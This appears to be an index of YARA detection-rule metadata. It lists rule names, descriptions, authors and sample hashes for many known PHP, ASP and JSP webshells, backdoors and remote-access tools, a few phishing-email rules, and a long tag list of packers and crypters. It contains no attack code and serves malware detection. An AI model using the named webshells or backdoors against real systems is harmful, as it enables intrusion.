webshells_index lamashell_php description: Semi-Auto-generated - file lamashell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: de9abc2e38420cad729648e93dfc6687
webshells_index Ajax_PHP_Command_Shell_php description: Semi-Auto-generated - file Ajax_PHP Command Shell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 93d1a2e13a3368a2472043bd6331afe9
webshells_index JspWebshell_1_2_jsp description: Semi-Auto-generated - file JspWebshell 1.2.jsp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 70a0ee2624e5bbe5525ccadc467519f6
webshells_index Sincap_php_php description: Semi-Auto-generated - file Sincap.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b68b90ff6012a103e57d141ed38a7ee9
webshells_index sh_php_php description: Semi-Auto-generated - file sh.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 330af9337ae51d0bac175ba7076d6299
webshells_index phpjackal_php description: Semi-Auto-generated - file phpjackal.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: ab230817bcc99acb9bdc0ec6d264d76f
webshells_index sql_php_php description: Semi-Auto-generated - file sql.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 8334249cbb969f2d33d678fec2b680c5
webshells_index cgi_python_py description: Semi-Auto-generated - file cgi-python.py.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 0a15f473e2232b89dae1075e1afdac97
webshells_index telnetd_pl description: Semi-Auto-generated - file telnetd.pl.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 5f61136afd17eb025109304bd8d6d414
webshells_index php_include_w_shell_php description: Semi-Auto-generated - file php-include-w-shell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 4e913f159e33867be729631a7ca46850
webshells_index Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 6163b30600f1e80d2bb5afaa753490b6
webshells_index shell_php_php description: Semi-Auto-generated - file shell.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 1a95f0163b6dea771da1694de13a3d8d
webshells_index telnet_cgi description: Semi-Auto-generated - file telnet.cgi.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: dee697481383052980c20c48de1598d1
webshells_index ironshell_php description: Semi-Auto-generated - file ironshell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 8bfa2eeb8a3ff6afc619258e39fded56
webshells_index backdoorfr_php description: Semi-Auto-generated - file backdoorfr.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 91e4afc7444ed258640e85bcaf0fecfc
webshells_index aspydrv_asp description: Semi-Auto-generated - file aspydrv.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 1c01f8a88baee39aa1cebec644bbcb99 score: 60
webshells_index cmdjsp_jsp description: Semi-Auto-generated - file cmdjsp.jsp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b815611cc39f17f05a73444d699341d4
webshells_index h4ntu_shell__powered_by_tsoi_ description: Semi-Auto-generated - file h4ntu shell [powered by tsoi].txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 06ed0b2398f8096f1bebf092d0526137
webshells_index Ajan_asp description: Semi-Auto-generated - file Ajan.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b6f468252407efc2318639da22b08af0
webshells_index PHANTASMA_php description: Semi-Auto-generated - file PHANTASMA.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 52779a27fa377ae404761a7ce76a5da7
webshells_index MySQL_Web_Interface_Version_0_8_php description: Semi-Auto-generated - file MySQL Web Interface Version 0.8.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 36d4f34d0a22080f47bb1cb94107c60f
webshells_index multiple_webshells_0002 description: Semi-Auto-generated - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _nst_php_php_img_php_php_nstview_php_php hash0: ddaf9f1986d17284de83a17fe5f9fd94 hash1: 17a07bb84e137b8aa60f87cd6bfab748 hash2: 4745d510fed4378e4b1730f56f25e569
webshells_index multiple_webshells_0003 description: Semi-Auto-generated - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _network_php_php_xinfo_php_php_nfm_php_php hash0: acdbba993a5a4186fd864c5e4ea0ba4f hash1: 2601b6fc1579f263d2f3960ce775df70 hash2: 401fbae5f10283051c39e640b77e4c26
webshells_index multiple_webshells_0005 description: Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php hash0: 0714f80f35c1fddef1f8938b8d42a4c8 hash1: 911195a9b7c010f61b66439d9048f400 hash2: eddf7a8fde1e50a7f2a817ef7cece24f hash3: 8023394542cddf8aee5dec6072ed02b5 hash4: eed14de3907c9aa2550d95550d1a2d5f hash5: 817671e1bdc85e04cc3440bbd9288800
webshells_index multiple_webshells_0010 description: Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _w_php_php_wacking_php_php_SpecialShell_99_php_php hash0: 38a3f9f2aa47c2e940695f3dba6a7bb2 hash1: 9c5bb5e3a46ec28039e8986324e42792 hash2: 09609851caa129e40b0d56e90dfc476c
webshells_index multiple_webshells_0015 description: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _wacking_php_php_1_SpecialShell_99_php_php_c100_php hash0: 9c5bb5e3a46ec28039e8986324e42792 hash1: 44542e5c3e9790815c49d5f9beffbbf2 hash2: 09609851caa129e40b0d56e90dfc476c hash3: 38fd7e45f9c11a37463c3ded1c76af4c
webshells_index multiple_webshells_0016 description: Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _r577_php_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php hash0: 0714f80f35c1fddef1f8938b8d42a4c8 hash1: eddf7a8fde1e50a7f2a817ef7cece24f hash2: 8023394542cddf8aee5dec6072ed02b5 hash3: eed14de3907c9aa2550d95550d1a2d5f hash4: 817671e1bdc85e04cc3440bbd9288800
webshells_index multiple_php_webshells description: Semi-Auto-generated - from files multiple_php_webshells author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 hash0: 0714f80f35c1fddef1f8938b8d42a4c8 hash1: 911195a9b7c010f61b66439d9048f400 hash2: be0f67f3e995517d18859ed57b4b4389 hash3: eddf7a8fde1e50a7f2a817ef7cece24f hash4: 8023394542cddf8aee5dec6072ed02b5 hash5: eed14de3907c9aa2550d95550d1a2d5f hash6: 817671e1bdc85e04cc3440bbd9288800 hash7: 7101fe72421402029e2629f3aaed6de7 hash8: f618f41f7ebeb5e5076986a66593afd1
webshells_index multiple_webshells_0019 description: Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _w_php_php_c99madshell_v2_1_php_php_wacking_php_php hash0: 38a3f9f2aa47c2e940695f3dba6a7bb2 hash1: 3ca5886cd54d495dc95793579611f59a hash2: 9c5bb5e3a46ec28039e8986324e42792
webshells_index multiple_webshells_0022 description: Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_SpecialShell_99_php_php hash0: 38a3f9f2aa47c2e940695f3dba6a7bb2 hash1: 3ca5886cd54d495dc95793579611f59a hash2: 9c5bb5e3a46ec28039e8986324e42792 hash3: d8ae5819a0a2349ec552cbcf3a62c975 hash4: 09609851caa129e40b0d56e90dfc476c
webshells_index multiple_webshells_0030 description: Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_1_SpecialShell_99_php_php hash0: 38a3f9f2aa47c2e940695f3dba6a7bb2 hash1: 3ca5886cd54d495dc95793579611f59a hash2: 9c5bb5e3a46ec28039e8986324e42792 hash3: 44542e5c3e9790815c49d5f9beffbbf2 hash4: 09609851caa129e40b0d56e90dfc476c
webshells_index multiple_webshells_0031 description: Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _r577_php_php_r57_php_php_spy_php_php_s_php_php hash0: 0714f80f35c1fddef1f8938b8d42a4c8 hash1: eddf7a8fde1e50a7f2a817ef7cece24f hash2: eed14de3907c9aa2550d95550d1a2d5f hash3: 817671e1bdc85e04cc3440bbd9288800
webshells_index PHP_Cloaked_Webshell_SuperFetchExec description: Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC reference: http://goo.gl/xFvioC author: Florian Roth score: 50
webshells_index WebShell_simattacker description: PHP Webshells Github Archive - file simattacker.php author: Florian Roth hash: 258297b62aeaf4650ce04642ad5f19be25ec29c9
webshells_index WebShell_b374k_mini_shell_php_php description: PHP Webshells Github Archive - file b374k-mini-shell-php.php.php author: Florian Roth hash: afb88635fbdd9ebe86b650cc220d3012a8c35143
webshells_index WebShell_b374k_php description: PHP Webshells Github Archive - file b374k.php.php author: Florian Roth hash: 04c99efd187cf29dc4e5603c51be44170987bce2
webshells_index WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend description: PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php author: Florian Roth hash: 6454cc5ab73143d72cf0025a81bd1fe710351b44
webshells_index WebShell_h4ntu_shell__powered_by_tsoi_ description: PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php author: Florian Roth hash: cbca8cd000e705357e2a7e0cf8262678706f18f9
webshells_index WebShell_php_webshells_MyShell description: PHP Webshells Github Archive - file MyShell.php author: Florian Roth hash: 42e283c594c4d061f80a18f5ade0717d3fb2f76d
webshells_index WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit description: PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php author: Florian Roth hash: b2b797707e09c12ff5e632af84b394ad41a46fa4
webshells_index WebShell_php_backdoor description: PHP Webshells Github Archive - file php-backdoor.php author: Florian Roth hash: b190c03af4f3fb52adc20eb0f5d4d151020c74fe
webshells_index WebShell_php_webshells_pHpINJ description: PHP Webshells Github Archive - file pHpINJ.php author: Florian Roth hash: 75116bee1ab122861b155cc1ce45a112c28b9596
webshells_index WebShell_php_webshells_NGH description: PHP Webshells Github Archive - file NGH.php author: Florian Roth hash: c05b5deecfc6de972aa4652cb66da89cfb3e1645
webshells_index WebShell_php_webshells_matamu description: PHP Webshells Github Archive - file matamu.php author: Florian Roth hash: d477aae6bd2f288b578dbf05c1c46b3aaa474733
webshells_index WebShell_ru24_post_sh description: PHP Webshells Github Archive - file ru24_post_sh.php author: Florian Roth hash: d2c18766a1cd4dda928c12ff7b519578ccec0769
webshells_index WebShell_hiddens_shell_v1 description: PHP Webshells Github Archive - file hiddens shell v1.php author: Florian Roth hash: 1674bd40eb98b48427c547bf9143aa7fbe2f4a59
webshells_index WebShell_safe0ver description: PHP Webshells Github Archive - file safe0ver.php author: Florian Roth hash: 366639526d92bd38ff7218b8539ac0f154190eb8
webshells_index WebShell_lamashell description: PHP Webshells Github Archive - file lamashell.php author: Florian Roth hash: b71181e0d899b2b07bc55aebb27da6706ea1b560
webshells_index WebShell_Simple_PHP_backdoor_by_DK description: PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php author: Florian Roth hash: 03f6215548ed370bec0332199be7c4f68105274e
webshells_index WebShell_AK_74_Security_Team_Web_Shell_Beta_Version description: PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php author: Florian Roth hash: c90b0ba575f432ecc08f8f292f3013b5532fe2c4
webshells_index WebShell_qsd_php_backdoor description: PHP Webshells Github Archive - file qsd-php-backdoor.php author: Florian Roth hash: 4856bce45fc5b3f938d8125f7cdd35a8bbae380f
webshells_index WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz description: PHP Webshells Github Archive - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.php author: Florian Roth hash: 5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68
webshells_index WebShell_WinX_Shell description: PHP Webshells Github Archive - file WinX Shell.php author: Florian Roth hash: a94d65c168344ad9fa406d219bdf60150c02010e
webshells_index WebShell_php_include_w_shell description: PHP Webshells Github Archive - file php-include-w-shell.php author: Florian Roth hash: 1a7f4868691410830ad954360950e37c582b0292
webshells_index WebShell_PhpSpy_Ver_2006 description: PHP Webshells Github Archive - file PhpSpy Ver 2006.php author: Florian Roth hash: 34a89e0ab896c3518d9a474b71ee636ca595625d
webshells_index WebShell_go_shell description: PHP Webshells Github Archive - file go-shell.php author: Florian Roth hash: 3dd85981bec33de42c04c53d081c230b5fc0e94f
webshells_index WebShell_zehir4_asp_php description: PHP Webshells Github Archive - file zehir4.asp.php.txt author: Florian Roth hash: 1d9b78b5b14b821139541cc0deb4cbbd994ce157
webshells_index WebShell_CasuS_1_5 description: PHP Webshells Github Archive - file CasuS 1.5.php author: Florian Roth hash: 7eee8882ad9b940407acc0146db018c302696341
webshells_index WebShell__findsock_php_findsock_shell_php_reverse_shell description: PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php author: Florian Roth super_rule: 1 hash0: 5622c9841d76617bfc3cd4cab1932d8349b7044f hash1: 4a20f36035bbae8e342aab0418134e750b881d05 hash2: 40dbdc0bdf5218af50741ba011c5286a723fa9bf
webshells_index Unpack_Injectt description: Webshells Auto-generated - file Injectt.exe author: Yara Bulk Rule Generator by Florian Roth hash: 8a5d2158a566c87edc999771e12d42c5
webshells_index FeliksPack3___PHP_Shells_ssh description: Webshells Auto-generated - file ssh.php author: Yara Bulk Rule Generator by Florian Roth hash: 1aa5307790d72941589079989b4f900e
webshells_index bin_Client description: Webshells Auto-generated - file Client.exe author: Yara Bulk Rule Generator by Florian Roth hash: 5f91a5b46d155cacf0cc6673a2a5461b
webshells_index ZXshell2_0_rar_Folder_ZXshell description: Webshells Auto-generated - file ZXshell.exe author: Yara Bulk Rule Generator by Florian Roth hash: 246ce44502d2f6002d720d350e26c288
webshells_index RkNTLoad description: Webshells Auto-generated - file RkNTLoad.exe author: Yara Bulk Rule Generator by Florian Roth hash: 262317c95ced56224f136ba532b8b34f
webshells_index binder2_binder2 description: Webshells Auto-generated - file binder2.exe author: Yara Bulk Rule Generator by Florian Roth hash: d594e90ad23ae0bc0b65b59189c12f11
webshells_index thelast_orice2 description: Webshells Auto-generated - file orice2.php author: Yara Bulk Rule Generator by Florian Roth hash: aa63ffb27bde8d03d00dda04421237ae
webshells_index sendmail description: Webshells Auto-generated - file sendmail.exe author: Yara Bulk Rule Generator by Florian Roth hash: 75b86f4a21d8adefaf34b3a94629bd17
webshells_index FSO_s_zehir4 description: Webshells Auto-generated - file zehir4.asp author: Yara Bulk Rule Generator by Florian Roth hash: 5b496a61363d304532bcf52ee21f5d55
webshells_index hkshell_hkshell description: Webshells Auto-generated - file hkshell.exe author: Yara Bulk Rule Generator by Florian Roth hash: 168cab58cee59dc4706b3be988312580
webshells_index DarkSpy105 description: Webshells Auto-generated - file DarkSpy105.exe author: Yara Bulk Rule Generator by Florian Roth hash: f0b85e7bec90dba829a3ede1ab7d8722
webshells_index EditServer_Webshell description: Webshells Auto-generated - file EditServer.exe author: Yara Bulk Rule Generator by Florian Roth hash: f945de25e0eba3bdaf1455b3a62b9832
webshells_index FSO_s_reader description: Webshells Auto-generated - file reader.asp author: Yara Bulk Rule Generator by Florian Roth hash: b598c8b662f2a1f6cc61f291fb0a6fa2
webshells_index svchostdll description: Webshells Auto-generated - file svchostdll.dll author: Yara Bulk Rule Generator by Florian Roth hash: 0f6756c8cb0b454c452055f189e4c3f4
webshells_index HYTop_DevPack_server description: Webshells Auto-generated - file server.asp author: Yara Bulk Rule Generator by Florian Roth hash: 1d38526a215df13c7373da4635541b43
webshells_index vanquish description: Webshells Auto-generated - file vanquish.dll author: Yara Bulk Rule Generator by Florian Roth hash: 684450adde37a93e8bb362994efc898c
webshells_index BIN_Client description: Webshells Auto-generated - file Client.exe author: Yara Bulk Rule Generator by Florian Roth hash: 9f0a74ec81bc2f26f16c5c172b80eca7
webshells_index Simple_PHP_BackDooR description: Webshells Auto-generated - file Simple_PHP_BackDooR.php author: Yara Bulk Rule Generator by Florian Roth hash: a401132363eecc3a1040774bec9cb24f
webshells_index hkshell_hkrmv description: Webshells Auto-generated - file hkrmv.exe author: Yara Bulk Rule Generator by Florian Roth hash: bd3a0b7a6b5536f8d96f50956560e9bf
webshells_index FeliksPack3___PHP_Shells_phpft description: Webshells Auto-generated - file phpft.php author: Yara Bulk Rule Generator by Florian Roth hash: 60ef80175fcc6a879ca57c54226646b1
webshells_index bdcli100 description: Webshells Auto-generated - file bdcli100.exe author: Yara Bulk Rule Generator by Florian Roth hash: b12163ac53789fb4f62e4f17a8c2e028
webshells_index rdrbs084 description: Webshells Auto-generated - file rdrbs084.exe author: Yara Bulk Rule Generator by Florian Roth hash: ed30327b255816bdd7590bf891aa0020
webshells_index HYTop_CaseSwitch_2005 description: Webshells Auto-generated - file 2005.exe author: Yara Bulk Rule Generator by Florian Roth hash: 8bf667ee9e21366bc0bd3491cb614f41
webshells_index FSO_s_casus15_2 description: Webshells Auto-generated - file casus15.php author: Yara Bulk Rule Generator by Florian Roth hash: 8d155b4239d922367af5d0a1b89533a3
webshells_index installer description: Webshells Auto-generated - file installer.cmd author: Yara Bulk Rule Generator by Florian Roth hash: a507919ae701cf7e42fa441d3ad95f8f
webshells_index elmaliseker description: Webshells Auto-generated - file elmaliseker.asp author: Yara Bulk Rule Generator by Florian Roth hash: ccf48af0c8c09bbd038e610a49c9862e
webshells_index shelltools_g0t_root_resolve description: Webshells Auto-generated - file resolve.exe author: Yara Bulk Rule Generator by Florian Roth hash: 69bf9aa296238610a0e05f99b5540297
webshells_index shelltools_g0t_root_Fport description: Webshells Auto-generated - file Fport.exe author: Yara Bulk Rule Generator by Florian Roth hash: dbb75488aa2fa22ba6950aead1ef30d5
webshells_index HYTop_DevPack_upload description: Webshells Auto-generated - file upload.asp author: Yara Bulk Rule Generator by Florian Roth hash: b09852bda534627949f0259828c967de
webshells_index PasswordReminder description: Webshells Auto-generated - file PasswordReminder.exe author: Yara Bulk Rule Generator by Florian Roth hash: ea49d754dc609e8bfa4c0f95d14ef9bf
webshells_index rknt_zip_Folder_RkNT description: Webshells Auto-generated - file RkNT.dll author: Yara Bulk Rule Generator by Florian Roth hash: 5f97386dfde148942b7584aeb6512b85
webshells_index dbgntboot description: Webshells Auto-generated - file dbgntboot.dll author: Yara Bulk Rule Generator by Florian Roth hash: 4d87543d4d7f73c1529c9f8066b475ab
webshells_index PHP_shell description: Webshells Auto-generated - file shell.php author: Yara Bulk Rule Generator by Florian Roth hash: 45e8a00567f8a34ab1cccc86b4bc74b9
webshells_index rdrbs100 description: Webshells Auto-generated - file rdrbs100.exe author: Yara Bulk Rule Generator by Florian Roth hash: 7c752bcd6da796d80a6830c61a632bff
webshells_index Mithril_Mithril description: Webshells Auto-generated - file Mithril.exe author: Yara Bulk Rule Generator by Florian Roth hash: 017191562d72ab0ca551eb89256650bd
webshells_index hkdoordll description: Webshells Auto-generated - file hkdoordll.dll author: Yara Bulk Rule Generator by Florian Roth hash: b715c009d47686c0e62d0981efce2552
webshells_index Mithril_v1_45_dllTest description: Webshells Auto-generated - file dllTest.dll author: Yara Bulk Rule Generator by Florian Roth hash: 1b9e518aaa62b15079ff6edb412b21e9
webshells_index dbgiis6cli description: Webshells Auto-generated - file dbgiis6cli.exe author: Yara Bulk Rule Generator by Florian Roth hash: 3044dceb632b636563f66fee3aaaf8f3
webshells_index Debug_cress description: Webshells Auto-generated - file cress.exe author: Yara Bulk Rule Generator by Florian Roth hash: 36a416186fe010574c9be68002a7286a
webshells_index FeliksPack3___PHP_Shells_usr description: Webshells Auto-generated - file usr.php author: Yara Bulk Rule Generator by Florian Roth hash: ade3357520325af50c9098dc8a21a024
webshells_index FSO_s_phpinj description: Webshells Auto-generated - file phpinj.php author: Yara Bulk Rule Generator by Florian Roth hash: dd39d17e9baca0363cc1c3664e608929
webshells_index xssshell_db description: Webshells Auto-generated - file db.asp author: Yara Bulk Rule Generator by Florian Roth hash: cb62e2ec40addd4b9930a9e270f5b318
webshells_index EditServer_Webshell_2 description: Webshells Auto-generated - file EditServer.exe author: Yara Bulk Rule Generator by Florian Roth hash: 5c1f25a4d206c83cdfb006b3eb4c09ba
webshells_index by064cli description: Webshells Auto-generated - file by064cli.exe author: Yara Bulk Rule Generator by Florian Roth hash: 10e0dff366968b770ae929505d2a9885
webshells_index Mithril_dllTest description: Webshells Auto-generated - file dllTest.dll author: Yara Bulk Rule Generator by Florian Roth hash: a8d25d794d8f08cd4de0c3d6bf389e6d
webshells_index connector description: Webshells Auto-generated - file connector.asp author: Yara Bulk Rule Generator by Florian Roth hash: 3ba1827fca7be37c8296cd60be9dc884
webshells_index shelltools_g0t_root_HideRun description: Webshells Auto-generated - file HideRun.exe author: Yara Bulk Rule Generator by Florian Roth hash: 45436d9bfd8ff94b71eeaeb280025afe
webshells_index regshell description: Webshells Auto-generated - file regshell.exe author: Yara Bulk Rule Generator by Florian Roth hash: db2fdc821ca6091bab3ebd0d8bc46ded
webshells_index PHP_Shell_v1_7 description: Webshells Auto-generated - file PHP_Shell_v1.7.php author: Yara Bulk Rule Generator by Florian Roth hash: b5978501c7112584532b4ca6fb77cba5
webshells_index xssshell_save description: Webshells Auto-generated - file save.asp author: Yara Bulk Rule Generator by Florian Roth hash: 865da1b3974e940936fe38e8e1964980
webshells_index screencap description: Webshells Auto-generated - file screencap.exe author: Yara Bulk Rule Generator by Florian Roth hash: 51139091dea7a9418a50f2712ea72aa6
webshells_index ZXshell2_0_rar_Folder_zxrecv description: Webshells Auto-generated - file zxrecv.exe author: Yara Bulk Rule Generator by Florian Roth hash: 5d3d12a39f41d51341ef4cb7ce69d30f
webshells_index _root_040_zip_Folder_deploy description: Webshells Auto-generated - file deploy.exe author: Yara Bulk Rule Generator by Florian Roth hash: 2c9f9c58999256c73a5ebdb10a9be269
webshells_index by063cli description: Webshells Auto-generated - file by063cli.exe author: Yara Bulk Rule Generator by Florian Roth hash: 49ce26eb97fd13b6d92a5e5d169db859
webshells_index icyfox007v1_10_rar_Folder_asp description: Webshells Auto-generated - file asp.asp author: Yara Bulk Rule Generator by Florian Roth hash: 2c412400b146b7b98d6e7755f7159bb9
webshells_index byshell063_ntboot_2 description: Webshells Auto-generated - file ntboot.dll author: Yara Bulk Rule Generator by Florian Roth hash: cb9eb5a6ff327f4d6c46aacbbe9dda9d
webshells_index shelltools_g0t_root_xwhois description: Webshells Auto-generated - file xwhois.exe author: Yara Bulk Rule Generator by Florian Roth hash: 0bc98bd576c80d921a3460f8be8816b4
webshells_index vanquish_2 description: Webshells Auto-generated - file vanquish.exe author: Yara Bulk Rule Generator by Florian Roth hash: 2dcb9055785a2ee01567f52b5a62b071
webshells_index ZXshell2_0_rar_Folder_nc description: Webshells Auto-generated - file nc.exe author: Yara Bulk Rule Generator by Florian Roth hash: 2cd1bf15ae84c5f6917ddb128827ae8b
webshells_index BIN_Server description: Webshells Auto-generated - file Server.exe author: Yara Bulk Rule Generator by Florian Roth hash: 1d5aa9cbf1429bb5b8bf600335916dcd
webshells_index HYTop2006_rar_Folder_2006 description: Webshells Auto-generated - file 2006.asp author: Yara Bulk Rule Generator by Florian Roth hash: c19d6f4e069188f19b08fa94d44bc283
webshells_index HDConfig description: Webshells Auto-generated - file HDConfig.exe author: Yara Bulk Rule Generator by Florian Roth hash: 7d60e552fdca57642fd30462416347bd
webshells_index Pastebin_Webshell description: Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs author: Florian Roth score: 70 date: 13.01.2015 reference: http://goo.gl/7dbyZs
webshells_index chinese_spam_echoer author: Vlad https://github.com/vlad-s date: 2016/07/18 description: Catches chinese PHP spam files (printers)
email_index CryptoWall_Resume_phish Author: http://phishme.com/ reference: https://github.com/phishme/malware_analysis/blob/master/yara_rules/cryptowall.yar
email_index with_attachment author: Antonio Sanchez <asanchez@hispasec.com> reference: http://laboratorio.blogs.hispasec.com/ description: Rule to detect the presence of an or several attachments
email_index davivienda
email_index email_Ukraine_power_attack_content author: @mmorenog,@yararules description: Detects a possible .eml used in the Ukraine BE power attack ref1: https://twitter.com/lowcalspam/status/692625258394726400
email_index content author: A.Sanchez <asanchez@koodous.com> description: Detects scam emails with phishing attachment. test1: email/eml/transferencia1.eml test2: email/eml/transferencia2.eml

YARA:TAGS

tags
possible_includes_base64_packed_functions silent_banker zbot Borland EnigmaProtector1XSukhovVladimirSergeNMarkin SPLayerv008 eXPressorv13CGSoftLabs Upackv032BetaDwing WiseInstallerStub AnskyaNTPackerGeneratorAnskya NsPack14byNorthStarLiuXingPing EmbedPEV100V124cyclotron SetupFactoryv6003SetupLauncher IMPPacker10MahdiHezavehiIMPOSTER PEProtectv09 UPXv20MarkusLaszloReiser PECompactv200alpha38 FreeCryptor01build001GlOFF UnnamedScrambler11Cp0ke PAVCryptorPawningAntiVirusCryptormasha_dev EncryptPEV22006115WFS PrincessSandyv10eMiNENCEProcessPatcherPatch ocBat2Exe10OC ASDPack20asd EXECryptor2021protectedIAT ThemidaWinLicenseV1XNoCompressionSecureEngineOreansTechnologies WinUpackv030betaByDwing ExeSafeguardv10simonzh PrivateEXEProtector20SetiSoft NTkrnlSecureSuite01015DLLNTkrnlSoftware UPXHiTv001DJSiba Vpackerttui eXPressorv12CGSoftLabs Enigmaprotector110111VladimirSukhov Obsidium1336ObsidiumSoftware MarjinZEXEScramblerSEbyMarjinZ Packman0001Bubbasoft aPackv098bDSESnotsaved ASProtectvIfyouknowthisversionpostonPEiDboardh2 AntiDote12DLLDemoSISTeam Themida1201OreansTechnologies ASProtectSKE21xexeAlexeySolodovnikov EXECryptorV21Xsoftcompletecom RCryptorv11Vaska nSpackV2xLiuXingPing MetrowerksCodeWarriorv20GUI UnnamedScrambler21Beta211p0ke NoodleCryptv20 BlindSpot10s134k DropperCreatorV01Conflict dUP2xPatcherwwwdiablo2oo2cjbnet EXECryptor2223compressedcodewwwstrongbitcom PolyCryptPE214b215JLabSoftwareCreationshoep MetrowerksCodeWarriorv20Console Upackv036alphaDwing NETDLLMicrosoft CelsiusCrypt21Z3r0 CreateInstallv200335 UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser Petite21 VProtectorvcasm XPackv142 ExeSplitter13SplitCryptMethodBillPrisonerTPOC EXECryptor224StrongbitSoftCompleteDevelopmenth3 ASProtectv12AlexeySolodovnikovh1 LY_WGKXwwwszleyucom Enigmaprotector110unregistered Upackv037v038BetaStripbaserelocationtableOptionDwing NTkrnlSecureSuiteNTkrnlteam AaseCrypterbysantasdad aPackv098bJibz UPackv011Dwing NsPacKNetLiuXingPing RLPv073betaap0x MetrowerksCodeWarriorDLLv20 PESpinv04x D1NS1GD1N MoleBoxv230Teggo Petite14 Petite13 RosAsm2050aBetov ACProtect14xRISCOsoft PEZipv10byBaGIE NsPackV2XLiuXingPing KBysPacker028BetaShoooo AntiDote12DemoSISTeam VProtector0X12Xvcasm VIRUSIWormKLEZ OpenSourceCodeCrypterp0ke QrYPt0rbyNuTraL EXECryptor2xxmaxcompressedresources MSLRHv032aemadicius EXECryptor2xxcompressedresources PolyBoxCAnskya UPolyXv05 PrivatePersonalPackerPPP102ConquestOfTroycom ENIGMAProtectorSukhovVladimir PuNkMoD1xPuNkDuDe InnoSetupModulev2018 AntiDote10Demo12SISTeam nSpackV23LiuXingPing NsPackv23NorthStar NTkrnlSecureSuite01015NTkrnlSoftware CrunchPEv40 hmimysProtectv10 PEPaCKv10CCopyright1998byANAKiN Upack022023betaDwing kkrunchyv017FGiesen ACProtectUltraProtect10X20XRiSco RLPV073betaap0x yCv13byAshkbizDanehkar PerlApp602ActiveState UPXProtectorv10x2 CodeVirtualizer1310OreansTechnologies VProtector13Xvcasm PEQuake006forgat D1S1Gv11BetaScrambledEXED1N UPX20030XMarkusOberhumerLaszloMolnarJohnReiser UnnamedScrambler12Bp0ke LauncherGeneratorv103 NakedPacker10byBigBoote ActiveMARK5xTrymediaSystemsInc 